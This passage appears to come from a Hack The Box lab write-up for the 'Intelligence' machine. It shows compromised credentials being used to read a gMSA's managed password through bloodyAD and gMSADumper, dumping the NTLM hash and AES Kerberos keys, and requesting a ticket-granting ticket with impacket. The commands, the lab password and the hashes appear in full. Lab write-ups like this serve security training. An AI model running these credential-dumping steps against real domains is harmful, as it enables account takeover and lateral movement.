ReadgMSAPassword
according to the earlier assessment, the ted.graves user has readgmsapassword access configured over the machine account, svc_int$
Now that the ted.graves user has been compromised, I will be able to proceed forward
The msDS-ManagedPassword is the LDAP attribute that shows the gMSA password
I could just request it with BloodyAD
┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ bloodyAD -d INTELLIGENCE.HTB -u ted.graves -p 'Mr.Teddy' --host dc.intelligence.htb get object 'svc_int$' --resolve-sd --attr msDS-ManagedPassword
distinguishedname: CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb
msds-managedpassword.ntlm: aad3b435b51404eeaad3b435b51404ee:ff3418066942aa8bd228ea17dc71999a
msds-managedpassword.b64encoded: I1tfJC/WE1fkf8go0H8t+TzuNS1gzRLOe/W/czO9odbBPDhOB2oMrmMFCWpyscJnCA1UtfDqb7zV4HkusuK30JcPhXL0ryf8Z2RiRzDHqav2YjYP9+0XEm8zqf6nzp2VcyBQFUZiQWpRtTKho7gkpJdDjInFHLlfLpFdIOxW+yGbcmL+PLjV+Y0SnrU1rCh+EHRfTxo6hLA0MSd5PqGaK+1X57Cib+CKWLO+gEuJkQHKaK3hCGXC1wqIMrBrCyJ+qUtZBh/HCM5C7mcYMLK+9ztRpcQ7cJ44RRtLprbX0glWFt9SGA5us9DgnaeId7QSro2P5Y1fgrwhMO+gmUp+yQ==aad3b435b51404eeaad3b435b51404ee:ff3418066942aa8bd228ea17dc71999a is the NTLM hash of the machine account, svc_int$
Kerberos Secrets
Technically, it’s also possible to retrieve Kerberos secrets (AES128 and AES256), which is preferred for OPSEC 3 well-known tools can be used for the operation;
- DSInternals : A PowerShell module
- GMSAPasswordReader: A C# based executable
- gMSADumper: A Python script
Both DSInternals and GMSAPasswordReader requires a valid session to the target system as the reading user, ted.graves, whereas gMSADumper can be used remotely
┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ python3 gMSADump.py -d INTELLIGENCE.HTB -u ted.graves -p 'Mr.Teddy' -l dc.intelligence.htb
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::ff3418066942aa8bd228ea17dc71999a
svc_int$:aes256-cts-hmac-sha1-96:30844881b57965c3a115cafa00eb0935928ff0af889f3818e0bc1ccf50c0cbfb
svc_int$:aes128-cts-hmac-sha1-96:327f8f8594183dfe4f430986556147b2Those are the additional Kerberos secrets in both AES128 and AES256 format
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ impacket-getTGT 'intelligence.htb/svc_int$@dc.intelligence.htb' -aesKey 30844881b57965c3a115cafa00eb0935928ff0af889f3818e0bc1ccf50c0cbfb -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Saving ticket in svc_int$@dc.intelligence.htb.ccacheValidated
TGT saved for the svc_int$ account